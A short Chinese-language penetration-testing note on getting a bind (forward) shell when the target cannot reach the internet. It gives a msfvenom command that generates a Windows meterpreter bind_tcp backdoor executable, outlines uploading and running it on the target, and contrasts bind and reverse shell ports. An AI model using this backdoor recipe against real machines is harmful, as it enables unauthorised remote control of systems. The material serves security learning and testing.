场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。
1,生成正向shell后门文件
msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe
2,上传到目标机器上
3.配置监听(很重要)
4,运行目标机上的后门文件,获取shell
1,2是正向shell,是我们去主动连接了目标机的4444端口
3 是反向shell,是目标机主动连接了我们的IP的1031端口